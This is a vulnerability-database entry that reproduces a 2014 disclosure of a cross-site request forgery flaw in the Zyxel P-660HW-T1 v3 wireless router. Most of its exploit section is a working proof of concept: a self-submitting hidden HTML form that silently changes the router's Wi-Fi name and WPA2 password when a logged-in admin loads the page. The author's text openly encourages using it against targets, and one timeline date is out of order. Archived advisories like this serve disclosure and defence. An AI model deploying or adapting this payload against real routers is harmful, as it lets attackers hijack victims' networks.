ID
VAR-E-201405-0422
TITLE
Zyxel P-660HW-T1 Cross Site Request Forgery
Trust: 0.5
DESCRIPTION
Zyxel P-660HW-T1 version 3 suffers from a cross site request forgery vulnerability.
Trust: 0.5
AFFECTED PRODUCTS
vendor: | zyxel | model: | p-660hw-t1 | scope: | - | version: | - | Trust: 0.5 |
EXPLOIT
# Exploit Title: Zyxel P-660HW-T1 v3 Wireless Router - CSRF Vulnerabilities
# Date: 05/28/2014
# Author: Mustafa ALTINKAYNAK
# Vendor Homepage: http://www.zyxel.com/tr/tr/products_services/p_660hw_series.shtml?t=p
# Category: Hardware/Wireless Router
# Tested on: Zyxel P-660HW-T1 v3 Wireless Router
# Patch/ Fix: Vendor has not provided any fix for this yet
---------------------------
Technical Details
---------------------------
This vulnerability was tested on P-660HW-T1 devices. Admin panel is open you can run remote code destination.
You can send the form below to prepare the target. Please offending. Being partners in crime.
Disclosure Timeline
---------------------------
05/21/2014 Contacted Vendor
05/22/2014 Vendor Replied
04/22/2014 Vulnerability Explained (No reply received)
05/26/2014 I was told that's not open vulnerabilities.
05/28/2014 Full Disclosure
Exploit Code
---------------------------
Change Wifi (WPA2/PSK) password & SSID by CSRF
---------------------------------------------------------------------------------
<html>
<body onload="document.form.submit();">
<form action="http://192.168.1.1/Forms/WLAN_General_1"
method="POST" name="form">
<input type="hidden" name="EnableWLAN" value="on">
<input type="hidden" name="Channel_ID" value="00000005">
<input type="hidden" name="ESSID" value="WIFI NAME">
<input type="hidden" name="Security_Sel" value="00000002">
<input type="hidden" name="SecurityFlag" value="0">
<input type="hidden" name="WLANCfgPSK" value="123456">
<input type="hidden" name="WLANCfgWPATimer" value="1800">
<input type="hidden" name="QoS_Sel" value="00000000">
<input type="hidden" name="sysSubmit" value="Uygula">
</form>
</body>
</html>
-----------
Mustafa ALTINKAYNAK
twitter : @m_altinkaynak <https://twitter.com/m_altinkaynak>
www.altinkaynak.biz
Trust: 0.5
PRICE
free
Trust: 0.5
TYPE
csrf
Trust: 0.5
TAGS
tag: | exploit | Trust: 0.5 |
tag: | csrf | Trust: 0.5 |
CREDITS
Mustafa ALTINKAYNAK
Trust: 0.5
EXTERNAL IDS
db: | PACKETSTORM | id: | 126812 | Trust: 0.5 |
SOURCES
db: | PACKETSTORM | id: | 126812 |
LAST UPDATE DATE
2022-07-27T09:56:36.336000+00:00
SOURCES RELEASE DATE
db: | PACKETSTORM | id: | 126812 | date: | 2014-05-27T16:18:01 |